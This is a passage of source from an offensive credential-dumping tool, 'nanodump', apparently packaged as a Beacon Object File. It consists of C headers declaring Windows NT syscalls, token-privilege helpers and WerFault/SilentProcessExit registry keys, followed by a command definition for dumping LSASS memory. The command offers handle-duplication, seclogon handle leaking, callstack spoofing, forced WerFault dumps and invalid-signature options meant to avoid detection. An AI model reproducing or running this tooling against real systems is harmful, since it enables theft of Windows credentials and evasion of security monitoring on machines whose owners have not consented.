//	ThreadPriorityBoost,
//	ThreadSetTlsArrayAddress,
//	ThreadIsIoPending,
//	ThreadHideFromDebugger,
//	ThreadBreakOnTermination,
//	MaxThreadInfoClass
//} THREADINFOCLASS, *PTHREADINFOCLASS;

//typedef struct _CLIENT_ID
//{
//	HANDLE UniqueProcess;
//	HANDLE UniqueThread;
//} CLIENT_ID, *PCLIENT_ID;

//typedef enum _PROCESSINFOCLASS
//{
//	ProcessBasicInformation = 0,
//	ProcessDebugPort = 7,
//	ProcessWow64Information = 26,
//	ProcessImageFileName = 27,
//	ProcessBreakOnTermination = 29
//} PROCESSINFOCLASS, *PPROCESSINFOCLASS;

typedef VOID(NTAPI* PIO_APC_ROUTINE) (
	IN PVOID            ApcContext,
	IN PIO_STATUS_BLOCK IoStatusBlock,
	IN ULONG            Reserved);

typedef struct _WNF_STATE_NAME
{
	ULONG Data[2];
} WNF_STATE_NAME, *PWNF_STATE_NAME;

typedef struct _WNF_TYPE_ID
{
	GUID TypeId;
} WNF_TYPE_ID, *PWNF_TYPE_ID;

typedef const WNF_STATE_NAME *PCWNF_STATE_NAME;

typedef const WNF_TYPE_ID *PCWNF_TYPE_ID;

typedef ULONG WNF_CHANGE_STAMP, *PWNF_CHANGE_STAMP;

typedef struct _ALPC_MESSAGE_ATTRIBUTES
{
	unsigned long AllocatedAttributes;
	unsigned long ValidAttributes;
} ALPC_MESSAGE_ATTRIBUTES, *PALPC_MESSAGE_ATTRIBUTES;

typedef struct _ALPC_PORT_ATTRIBUTES
{
	ULONG                       Flags;
	SECURITY_QUALITY_OF_SERVICE SecurityQos;
	SIZE_T                      MaxMessageLength;
	SIZE_T                      MemoryBandwidth;
	SIZE_T                      MaxPoolUsage;
	SIZE_T                      MaxSectionSize;
	SIZE_T                      MaxViewSize;
	SIZE_T                      MaxTotalSectionSize;
	ULONG                       DupObjectTypes;
#ifdef _WIN64
	ULONG                       Reserved;
#endif
} ALPC_PORT_ATTRIBUTES, *PALPC_PORT_ATTRIBUTES;

typedef short CSHORT;
typedef struct _QUAD
{
	union
	{
		INT64 UseThisFieldToCopy;
		float DoNotUseThisField;
	};
} QUAD, * PQUAD;

typedef struct PORT_MESSAGE
{
	union
	{
		struct
		{
			CSHORT DataLength;
			CSHORT TotalLength;
		} s1;
		ULONG Length;
	} u1;
	union
	{
		struct
		{
			CSHORT Type;
			CSHORT DataInfoOffset;
		} s2;
		ULONG ZeroInit;
	} u2;
	union
	{
		CLIENT_ID ClientId;
		QUAD DoNotUseThisField;
	};
	ULONG MessageId;
	union
	{
		SIZE_T ClientViewSize;
		ULONG CallbackId;
	};
} PORT_MESSAGE, * PPORT_MESSAGE;

// WER_API_MESSAGE should probably be just one struct
// I didn't not find this structure documented

typedef struct _WER_API_MESSAGE_SEND
{
    PORT_MESSAGE port_message;
    ULONG32 value1;
    ULONG32 value2;
    DWORD ThreadId;
    DWORD ProcessId;
    DWORD TargetProcessId;
    BYTE empty[0x538];
} WER_API_MESSAGE_SEND, *PWER_API_MESSAGE_SEND;

typedef struct _WER_API_MESSAGE_RECV
{
    PORT_MESSAGE port_message;
    ULONG32 value1;
    ULONG32 value2;
    HANDLE Handle;
    DWORD TargetProcessId;
    BYTE empty[0x538];
} WER_API_MESSAGE_RECV, *PWER_API_MESSAGE_RECV;

typedef struct _ReportExceptionWerAlpcMessage
{
    PORT_MESSAGE PortMessage;
    DWORD MessageType;
    NTSTATUS NtStatusErrorCode;
    DWORD Flags;
    DWORD TargetProcessId;
    HANDLE hFileMapping;
#ifndef _WIN64
    DWORD Filler0;
#endif
    HANDLE hRecoveryEvent;
#ifndef _WIN64
    DWORD Filler1;
#endif
    HANDLE hCompletionEvent;
#ifndef _WIN64
    DWORD Filler2;
#endif
    HANDLE hFileMapping2;
#ifndef _WIN64
    DWORD Filler3;
#endif
    HANDLE hTargetProcess;
#ifndef _WIN64
    DWORD Filler4;
#endif
    HANDLE hTargetThread;
#ifndef _WIN64
    DWORD Filler5;
#endif
    DWORD Filler6[324];
} ReportExceptionWerAlpcMessage, *PReportExceptionWerAlpcMessage;

typedef struct _PS_ATTRIBUTE
{
	ULONG  Attribute;
	SIZE_T Size;
	union
	{
		ULONG Value;
		PVOID ValuePtr;
	} u1;
	PSIZE_T ReturnLength;
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST
{
	SIZE_T       TotalLength;
	PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

typedef enum _EVENT_TYPE
{
	NotificationEvent = 0,
	SynchronizationEvent = 1,
} EVENT_TYPE, *PEVENT_TYPE;

typedef struct _THREAD_BASIC_INFORMATION {
  NTSTATUS                ExitStatus;
  PVOID                   TebBaseAddress;
  CLIENT_ID               ClientId;
  KAFFINITY               AffinityMask;
  KPRIORITY               Priority;
  KPRIORITY               BasePriority;
} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;

typedef enum _SECTION_INHERIT
{
	ViewShare = 1,
	ViewUnmap = 2
} SECTION_INHERIT, *PSECTION_INHERIT;

EXTERN_C NTSTATUS NtOpenProcess(
	OUT PHANDLE ProcessHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN PVOID ClientId OPTIONAL);

EXTERN_C NTSTATUS NtGetNextProcess(
	IN HANDLE ProcessHandle,
	IN ACCESS_MASK DesiredAccess,
	IN ULONG HandleAttributes,
	IN ULONG Flags,
	OUT PHANDLE NewProcessHandle);

EXTERN_C NTSTATUS NtReadVirtualMemory(
	IN HANDLE ProcessHandle,
	IN PVOID BaseAddress,
	OUT PVOID Buffer,
	IN SIZE_T BufferSize,
	OUT PSIZE_T NumberOfBytesRead OPTIONAL);

EXTERN_C NTSTATUS NtClose(
	IN HANDLE Handle);

EXTERN_C NTSTATUS NtOpenProcessToken(
	IN HANDLE ProcessHandle,
	IN ACCESS_MASK DesiredAccess,
	OUT PHANDLE TokenHandle);

EXTERN_C NTSTATUS NtQueryInformationProcess(
	IN HANDLE ProcessHandle,
	IN PROCESSINFOCLASS ProcessInformationClass,
	OUT PVOID ProcessInformation,
	IN ULONG ProcessInformationLength,
	OUT PULONG ReturnLength OPTIONAL);

EXTERN_C NTSTATUS NtQueryVirtualMemory(
	IN HANDLE ProcessHandle,
	IN PVOID BaseAddress,
	IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
	OUT PVOID MemoryInformation,
	IN SIZE_T MemoryInformationLength,
	OUT PSIZE_T ReturnLength OPTIONAL);

EXTERN_C NTSTATUS NtAdjustPrivilegesToken(
	IN HANDLE TokenHandle,
	IN BOOLEAN DisableAllPrivileges,
	IN PTOKEN_PRIVILEGES NewState OPTIONAL,
	IN ULONG BufferLength,
	OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,
	OUT PULONG ReturnLength OPTIONAL);

EXTERN_C NTSTATUS NtAllocateVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID * BaseAddress,
	IN ULONG ZeroBits,
	IN OUT PSIZE_T RegionSize,
	IN ULONG AllocationType,
	IN ULONG Protect);

EXTERN_C NTSTATUS NtFreeVirtualMemory(
	IN HANDLE ProcessHandle,
	IN OUT PVOID * BaseAddress,
	IN OUT PSIZE_T RegionSize,
	IN ULONG FreeType);

EXTERN_C NTSTATUS NtCreateFile(
	OUT PHANDLE FileHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	IN PLARGE_INTEGER AllocationSize OPTIONAL,
	IN ULONG FileAttributes,
	IN ULONG ShareAccess,
	IN ULONG CreateDisposition,
	IN ULONG CreateOptions,
	IN PVOID EaBuffer OPTIONAL,
	IN ULONG EaLength);

EXTERN_C NTSTATUS NtWriteFile(
	IN HANDLE FileHandle,
	IN HANDLE Event OPTIONAL,
	IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
	IN PVOID ApcContext OPTIONAL,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	IN PVOID Buffer,
	IN ULONG Length,
	IN PLARGE_INTEGER ByteOffset OPTIONAL,
	IN PULONG Key OPTIONAL);

EXTERN_C NTSTATUS NtCreateProcessEx(
	OUT PHANDLE ProcessHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN HANDLE ParentProcess,
	IN ULONG Flags,
	IN HANDLE SectionHandle OPTIONAL,
	IN HANDLE DebugPort OPTIONAL,
	IN HANDLE ExceptionPort OPTIONAL,
	IN ULONG JobMemberLevel);

NTSTATUS NtQuerySystemInformation(
	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
	IN OUT PVOID SystemInformation,
	IN ULONG SystemInformationLength,
	OUT PULONG ReturnLength OPTIONAL);

NTSTATUS NtDuplicateObject(
	IN HANDLE SourceProcessHandle,
	IN HANDLE SourceHandle,
	IN HANDLE TargetProcessHandle OPTIONAL,
	OUT PHANDLE TargetHandle OPTIONAL,
	IN ACCESS_MASK DesiredAccess,
	IN ULONG HandleAttributes,
	IN ULONG Options);

NTSTATUS NtQueryObject_(
	IN HANDLE Handle,
	IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
	OUT PVOID ObjectInformation OPTIONAL,
	IN ULONG ObjectInformationLength,
	OUT PULONG ReturnLength OPTIONAL);

NTSTATUS NtWaitForSingleObject(
	IN HANDLE ObjectHandle,
	IN BOOLEAN Alertable,
	IN PLARGE_INTEGER TimeOut OPTIONAL);

NTSTATUS NtDeleteFile(
	IN POBJECT_ATTRIBUTES ObjectAttributes);

NTSTATUS NtTerminateProcess(
	IN HANDLE ProcessHandle OPTIONAL,
	IN NTSTATUS ExitStatus);

EXTERN_C NTSTATUS NtSetInformationProcess_(
	IN HANDLE DeviceHandle,
	IN PROCESSINFOCLASS ProcessInformationClass,
	IN PVOID ProcessInformation,
	IN ULONG Length);

EXTERN_C NTSTATUS NtQueryInformationToken(
	IN HANDLE TokenHandle,
	IN TOKEN_INFORMATION_CLASS TokenInformationClass,
	OUT PVOID TokenInformation,
	IN ULONG TokenInformationLength,
	OUT PULONG ReturnLength);

EXTERN_C NTSTATUS NtDuplicateToken(
	IN HANDLE ExistingTokenHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN BOOLEAN EffectiveOnly,
	IN TOKEN_TYPE TokenType,
	OUT PHANDLE NewTokenHandle);

EXTERN_C NTSTATUS NTAPI NtSetInformationThread(
	IN HANDLE ThreadHandle,
	IN THREADINFOCLASS ThreadInformationClass,
	IN PVOID ThreadInformation,
	IN ULONG ThreadInformationLength);

EXTERN_C NTSTATUS NtCreateDirectoryObjectEx(
	OUT PHANDLE DirectoryHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN HANDLE ShadowDirectoryHandle,
	IN ULONG Flags);

EXTERN_C NTSTATUS NtCreateSymbolicLinkObject(
	OUT PHANDLE LinkHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN PUNICODE_STRING LinkTarget);

EXTERN_C NTSTATUS NtOpenSymbolicLinkObject(
	OUT PHANDLE LinkHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes);

EXTERN_C NTSTATUS NtQuerySymbolicLinkObject(
	IN HANDLE LinkHandle,
	IN OUT PUNICODE_STRING LinkTarget,
	OUT PULONG ReturnedLength OPTIONAL);

EXTERN_C NTSTATUS NtCreateSection(
	OUT PHANDLE SectionHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN PLARGE_INTEGER MaximumSize OPTIONAL,
	IN ULONG SectionPageProtection,
	IN ULONG AllocationAttributes,
	IN HANDLE FileHandle OPTIONAL);

EXTERN_C NTSTATUS NtOpenThreadToken(
	IN HANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN BOOLEAN OpenAsSelf,
	OUT PHANDLE TokenHandle);

EXTERN_C NTSTATUS NtCreateTransaction(
	OUT PHANDLE TransactionHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN LPGUID Uow OPTIONAL,
	IN HANDLE TmHandle OPTIONAL,
	IN ULONG CreateOptions OPTIONAL,
	IN ULONG IsolationLevel OPTIONAL,
	IN ULONG IsolationFlags OPTIONAL,
	IN PLARGE_INTEGER Timeout OPTIONAL,
	IN PUNICODE_STRING Description OPTIONAL);

EXTERN_C NTSTATUS NtQueryInformationFile(
	IN HANDLE FileHandle,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	OUT PVOID FileInformation,
	IN ULONG Length,
	IN FILE_INFORMATION_CLASS FileInformationClass);

EXTERN_C NTSTATUS NtMakeTemporaryObject(
	IN HANDLE Handle);

EXTERN_C NTSTATUS NtCreateKey(
	OUT PHANDLE KeyHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN ULONG TitleIndex,
	IN PUNICODE_STRING Class OPTIONAL,
	IN ULONG CreateOptions,
	OUT PULONG Disposition OPTIONAL);

EXTERN_C NTSTATUS NtSetValueKey(
	IN HANDLE KeyHandle,
	IN PUNICODE_STRING ValueName,
	IN ULONG TitleIndex OPTIONAL,
	IN ULONG Type,
	IN PVOID SystemData,
	IN ULONG DataSize);

EXTERN_C NTSTATUS NtQueryWnfStateNameInformation(
	IN PVOID StateName,
	IN ULONG NameInfoClass,
	IN PVOID ExplicitScope OPTIONAL,
	OUT PVOID InfoBuffer,
	IN ULONG InfoBufferSize);

EXTERN_C NTSTATUS NtUpdateWnfStateData(
	IN PVOID StateName,
	IN PVOID Buffer OPTIONAL,
	IN ULONG Length OPTIONAL,
	IN PCWNF_TYPE_ID TypeId OPTIONAL,
	IN PVOID ExplicitScope OPTIONAL,
	IN WNF_CHANGE_STAMP MatchingChangeStamp,
	IN ULONG CheckStamp);

EXTERN_C NTSTATUS NtOpenEvent(
	OUT PHANDLE EventHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes);

EXTERN_C NTSTATUS NtAlpcConnectPort(
	OUT PHANDLE PortHandle,
	IN PUNICODE_STRING PortName,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
	IN ULONG Flags,
	IN PSID RequiredServerSid OPTIONAL,
	IN OUT PVOID ConnectionMessage OPTIONAL,
	IN OUT PULONG BufferLength OPTIONAL,
	IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
	IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
	IN PLARGE_INTEGER Timeout OPTIONAL);

EXTERN_C NTSTATUS NtAlpcSendWaitReceivePort(
	IN HANDLE PortHandle,
	IN ULONG Flags,
	IN PPORT_MESSAGE SendMessage OPTIONAL,
	IN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,
	OUT PPORT_MESSAGE ReceiveMessage OPTIONAL,
	IN OUT PSIZE_T BufferLength OPTIONAL,
	IN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,
	IN PLARGE_INTEGER Timeout OPTIONAL);

EXTERN_C NTSTATUS NtCreateThreadEx(
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN HANDLE ProcessHandle,
	IN PVOID StartRoutine,
	IN PVOID Argument OPTIONAL,
	IN ULONG CreateFlags,
	IN SIZE_T ZeroBits,
	IN SIZE_T StackSize,
	IN SIZE_T MaximumStackSize,
	IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);

EXTERN_C NTSTATUS NtDeleteKey(
	IN HANDLE KeyHandle);

EXTERN_C NTSTATUS NtPrivilegeCheck(
	IN HANDLE ClientToken,
	IN OUT PPRIVILEGE_SET RequiredPrivileges,
	OUT PBOOL Result);

EXTERN_C NTSTATUS NtCreateEvent(
	OUT PHANDLE EventHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
	IN EVENT_TYPE EventType,
	IN BOOLEAN InitialState);

EXTERN_C NTSTATUS NtTerminateThread(
	IN HANDLE ThreadHandle,
	IN NTSTATUS ExitStatus);

EXTERN_C NTSTATUS _NtFsControlFile(
	IN HANDLE FileHandle,
	IN HANDLE Event OPTIONAL,
	IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
	IN PVOID ApcContext OPTIONAL,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	IN ULONG FsControlCode,
	IN PVOID InputBuffer OPTIONAL,
	IN ULONG InputBufferLength,
	OUT PVOID OutputBuffer OPTIONAL,
	IN ULONG OutputBufferLength);

EXTERN_C NTSTATUS NtGetContextThread(
	IN HANDLE ThreadHandle,
	IN OUT PCONTEXT ThreadContext);

EXTERN_C NTSTATUS NtSetContextThread(
	IN HANDLE ThreadHandle,
	IN PCONTEXT Context);

EXTERN_C NTSTATUS NtResumeThread(
	IN HANDLE ThreadHandle,
	IN OUT PULONG PreviousSuspendCount OPTIONAL);

EXTERN_C NTSTATUS NtDelayExecution(
	IN BOOLEAN Alertable,
	IN PLARGE_INTEGER DelayInterval);

EXTERN_C NTSTATUS NtGetNextThread(
	IN HANDLE ProcessHandle,
	IN HANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN ULONG HandleAttributes,
	IN ULONG Flags,
	OUT PHANDLE NewThreadHandle);

EXTERN_C NTSTATUS _NtQueryInformationThread(
	IN HANDLE ThreadHandle,
	IN THREADINFOCLASS ThreadInformationClass,
	OUT PTHREAD_BASIC_INFORMATION ThreadInformation,
	IN ULONG ThreadInformationLength,
	OUT PULONG ReturnLength OPTIONAL);

EXTERN_C NTSTATUS NtOpenThread(
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN CLIENT_ID* ClientId OPTIONAL);

EXTERN_C NTSTATUS NtMapViewOfSection(
	IN HANDLE SectionHandle,
	IN HANDLE ProcessHandle,
	IN OUT PVOID BaseAddress,
	IN ULONG ZeroBits,
	IN SIZE_T CommitSize,
	IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
	IN OUT PSIZE_T ViewSize,
	IN SECTION_INHERIT InheritDisposition,
	IN ULONG AllocationType,
	IN ULONG Win32Protect);

EXTERN_C NTSTATUS NtUnmapViewOfSection(
	IN HANDLE ProcessHandle,
	IN PVOID BaseAddress);

EXTERN_C NTSTATUS NtImpersonateThread(
    IN HANDLE ThreadHandle,
    IN HANDLE ThreadToImpersonate,
    IN PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);

#endif


================================================
FILE: Creds-BOF/nanodump/include/token_priv.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "utils.h"
#include "dinvoke.h"

typedef BOOL(WINAPI* LookupPrivilegeValueW_t) (LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid);
typedef BOOL(WINAPI* LookupPrivilegeNameW_t) (LPCSTR lpSystemName, PLUID lpLuid, LPWSTR lpName, LPDWORD cchName);

#define LookupPrivilegeValueW_SW2_HASH 0xD496970C
#define LookupPrivilegeNameW_SW2_HASH 0x11A5C11E

#define SeDebugPrivilege L"SeDebugPrivilege"

BOOL enable_impersonate_priv(VOID);

BOOL enable_debug_priv(VOID);

BOOL check_token_privileges(
    IN HANDLE hToken OPTIONAL,
    IN LPCWSTR ppwszRequiredPrivileges[],
    IN ULONG32 dwNumRequiredPrivileges,
    IN BOOL bEnablePrivilege);

BOOL check_token_privilege(
    IN HANDLE hToken OPTIONAL,
    IN LPCWSTR pwszPrivilege,
    IN BOOL bEnablePrivilege);


================================================
FILE: Creds-BOF/nanodump/include/utils.h
================================================
#pragma once

#include "nanodump.h"
#include "ntdefs.h"
#include "output.h"

#define UNUSED(x) (void)(x)

#if defined(_MSC_VER)
 #define ProcessInstrumentationCallback 40
#endif

typedef struct _linked_list
{
    struct _linked_list* next;
} linked_list, *Plinked_list;

#define intAlloc(size) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) HeapFree(GetProcessHeap(), 0, addr)
#define DATA_FREE(d, l) \
    if (d) { \
        memset(d, 0, l); \
        intFree(d); \
        d = NULL; \
    }

#define RVA(type, base_addr, rva) (type)(ULONG_PTR)((ULONG_PTR) base_addr + rva)

typedef DWORD(WINAPI* GetEnvironmentVariableW_t) (LPCWSTR lpName, LPWSTR lpBuffer, DWORD nSize);

#define GetEnvironmentVariableW_SW2_HASH 0x2F9C600B

#ifdef _WIN64
 #define CID_OFFSET 0x40
 #define TEB_OFFSET 0x30
 #define PEB_OFFSET 0x60
 #define READ_MEMLOC __readgsqword
#else
 #define CID_OFFSET 0x20
 #define TEB_OFFSET 0x18
 #define PEB_OFFSET 0x30
 #define READ_MEMLOC __readfsdword
#endif

typedef enum  {
  PSS_CAPTURE_NONE = 0x00000000,
  PSS_CAPTURE_VA_CLONE = 0x00000001,
  PSS_CAPTURE_RESERVED_00000002 = 0x00000002,
  PSS_CAPTURE_HANDLES = 0x00000004,
  PSS_CAPTURE_HANDLE_NAME_INFORMATION = 0x00000008,
  PSS_CAPTURE_HANDLE_BASIC_INFORMATION = 0x00000010,
  PSS_CAPTURE_HANDLE_TYPE_SPECIFIC_INFORMATION = 0x00000020,
  PSS_CAPTURE_HANDLE_TRACE = 0x00000040,
  PSS_CAPTURE_THREADS = 0x00000080,
  PSS_CAPTURE_THREAD_CONTEXT = 0x00000100,
  PSS_CAPTURE_THREAD_CONTEXT_EXTENDED = 0x00000200,
  PSS_CAPTURE_RESERVED_00000400 = 0x00000400,
  PSS_CAPTURE_VA_SPACE = 0x00000800,
  PSS_CAPTURE_VA_SPACE_SECTION_INFORMATION = 0x00001000,
  PSS_CAPTURE_IPT_TRACE = 0x00002000,
  PSS_CAPTURE_RESERVED_00004000,
  PSS_CREATE_BREAKAWAY_OPTIONAL = 0x04000000,
  PSS_CREATE_BREAKAWAY = 0x08000000,
  PSS_CREATE_FORCE_BREAKAWAY = 0x10000000,
  PSS_CREATE_USE_VM_ALLOCATIONS = 0x20000000,
  PSS_CREATE_MEASURE_PERFORMANCE = 0x40000000,
  PSS_CREATE_RELEASE_SECTION = 0x80000000
} PSS_CAPTURE_FLAGS;

typedef enum  {
  PSS_QUERY_PROCESS_INFORMATION = 0,
  PSS_QUERY_VA_CLONE_INFORMATION = 1,
  PSS_QUERY_AUXILIARY_PAGES_INFORMATION = 2,
  PSS_QUERY_VA_SPACE_INFORMATION = 3,
  PSS_QUERY_HANDLE_INFORMATION = 4,
  PSS_QUERY_THREAD_INFORMATION = 5,
  PSS_QUERY_HANDLE_TRACE_INFORMATION = 6,
  PSS_QUERY_PERFORMANCE_COUNTERS = 7
} PSS_QUERY_INFORMATION_CLASS;

struct _CURDIR
{
    struct _UNICODE_STRING DosPath;
    VOID* Handle;
};

typedef struct _PROCESS_PARAMETERS
{
    ULONG MaximumLength;
    ULONG Length;
    ULONG Flags;
    ULONG DebugFlags;
    VOID* ConsoleHandle;
    ULONG ConsoleFlags;
    VOID* StandardInput;
    VOID* StandardOutput;
    VOID* StandardError;
    struct _CURDIR CurrentDirectory;
    struct _UNICODE_STRING DllPath;
    struct _UNICODE_STRING ImagePathName;
    struct _UNICODE_STRING CommandLine;
} PROCESS_PARAMETERS, *PPROCESS_PARAMETERS;

typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION
{
    ULONG Version;
    ULONG Reserved;
    PVOID Callback;
} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, *PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION;

BOOL print_shtinkering_crash_location(VOID);

BOOL get_env_var(
    IN LPWSTR name,
    OUT LPWSTR value,
    IN DWORD size);

DWORD get_tick_count(VOID);

BOOL find_process_id_by_name(
    IN LPCSTR process_name,
    OUT PDWORD pPid);

BOOL is_full_path(
    IN LPCSTR filename);

VOID get_full_path(
    OUT PUNICODE_STRING full_dump_path,
    IN LPCSTR filename);

LPCWSTR get_cwd(VOID);

BOOL write_file(
    IN PUNICODE_STRING full_dump_path,
    IN PBYTE fileData,
    IN ULONG32 fileLength);

BOOL create_file(
    IN PUNICODE_STRING full_dump_path);

BOOL download_file(
    IN DWORD chunk_size,
    IN LPCSTR fileName,
    IN char fileData[],
    IN ULONG32 fileLength);

BOOL delete_file(
    IN LPCSTR filepath);

BOOL file_exists(
    IN LPCSTR filepath);

BOOL create_folder(
    IN LPCSTR folderpath);

BOOL wait_for_process(
    IN HANDLE hProcess);

BOOL get_process_image(
    IN HANDLE hProcess,
    OUT PUNICODE_STRING* process_image,
    OUT PULONG buffer_size);

BOOL is_lsass(
    IN HANDLE hProcess);

DWORD get_pid(
    IN HANDLE hProcess);

DWORD get_tid(
    IN HANDLE hThread);

BOOL kill_process(
    IN DWORD pid,
    IN HANDLE hProcess);

DWORD get_lsass_pid(VOID);

BOOL remove_syscall_callback_hook(VOID);

VOID print_success(
    IN LPCSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL write_dump_to_disk);

VOID free_linked_list(
    IN PVOID head,
    IN ULONG node_size);

PVOID allocate_memory(
    OUT PSIZE_T region_size);

VOID encrypt_dump(
    IN PVOID base_address,
    IN SIZE_T region_size);

VOID erase_dump_from_memory(
    IN PVOID base_address,
    IN SIZE_T region_size);

VOID generate_invalid_sig(
    OUT PULONG32 Signature,
    OUT PUSHORT Version,
    OUT PUSHORT ImplementationVersion);



================================================
FILE: Creds-BOF/nanodump/include/werfault.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "ntdefs.h"
#include "dinvoke.h"
#include "syscalls.h"

#define SystemErrorPortTimeouts 0x73

typedef VOID(WINAPI *RtlInitUnicodeString_t)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
typedef NTSTATUS(NTAPI *RtlAppendUnicodeToString_t)(PUNICODE_STRING Destination, PCWSTR Source);
typedef VOID(WINAPI *RtlFreeUnicodeString_t)(PUNICODE_STRING UnicodeString);
typedef NTSTATUS(NTAPI* RtlReportSilentProcessExit_t) (HANDLE ProcessHandle, NTSTATUS ExitStatus);

#define RtlInitUnicodeString_SW2_HASH 0x7B6E73FC
#define RtlAppendUnicodeToString_SW2_HASH 0x8626F2C6
#define RtlFreeUnicodeString_SW2_HASH 0x68A85C74
#define RtlReportSilentProcessExit_SW2_HASH 0x91BFF14B

#define IFEO_REG_KEY L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"
#define SILENT_PROCESS_EXIT_REG_KEY L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\"
#define LOCAL_DUMP 0x2
#define FLG_MONITOR_SILENT_PROCESS_EXIT 0x200
#define MiniDumpWithFullMemory 0x2

BOOL werfault_silent_process_exit(
    DWORD lsass_pid,
    LPCSTR dump_folder);

BOOL werfault_create_thread(
    HANDLE hProcess);


================================================
FILE: Creds-BOF/nanodump/nanodump.axs
================================================
var cmd_nanodump = ax.create_command("nanodump", "Use syscalls to dump LSASS", "nanodump -d -w C:\\Windows\\Temp\\report.docx");
cmd_nanodump.addArgFlagString( "-w", "DUMP_PATH",         false, "Filename of the dump");
cmd_nanodump.addArgBool(       "--valid",                        "Create a dump with a valid signature");
cmd_nanodump.addArgBool(       "-d",                             "Duplicate: a high privileged existing LSASS handle");
cmd_nanodump.addArgBool(       "-de",                            "Duplicate-elevate: a low privileged existing LSASS handle and then elevate it");
// cmd_nanodump.addArgBool(       "-sll",                           "Seclogon-leak-local: leak an LSASS handle into nanodump via seclogon");
cmd_nanodump.addArgFlagString( "-slr", "SLR_BIN_PATH",    false, "Seclogon-leak-remote: leak an LSASS handle into another process via seclogon and duplicate it");
cmd_nanodump.addArgBool(       "-sd",                            "Seclogon-duplicate: make seclogon open a handle to LSASS and duplicate it");
cmd_nanodump.addArgBool(       "-sc",                            "Spoof-callstack: open a handle to LSASS using a fake calling stack");
cmd_nanodump.addArgFlagString( "-spe", "SPE_DUMP_FOLDER", false, "Silent-process-exit: force WerFault.exe to dump LSASS via SilentProcessExit");
cmd_nanodump.addArgBool(       "-sk",                            "Force WerFault.exe to dump LSASS via Shtinkering (Need SYSTEM)");
cmd_nanodump.addArgBool(       "--fork",                         "Fork the target process before dumping");
cmd_nanodump.addArgBool(       "--snapshot",                     "Snapshot the target process before dumping");
cmd_nanodump.addArgBool(       "-eh",                            "Elevate-handle: open a handle to LSASS with low privileges and duplicate it to gain higher privileges");
cmd_nanodump.addArgBool(       "--getpid",                       "Print the PID of LSASS and leave");
cmd_nanodump.addArgFlagInt(    "--pid", "PID",            false, "PID of LSASS");

cmd_nanodump.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)
{
    if( ax.is64(id) == false ) { throw new Error("WoW64 is not supported"); }

    if( ax.isadmin(id) == false ) { throw new Error("You need to be admin to run nanodump"); }

    let silent_process_exit = "";
    let use_silent_process_exit = 0;
    let seclogon_leak_remote_binary = "";
    let use_seclogon_leak_local = 0;
    let use_seclogon_leak_remote = 0;
    let use_seclogon_duplicate = 0;
    let get_pid = 0;
    let pid = 0;
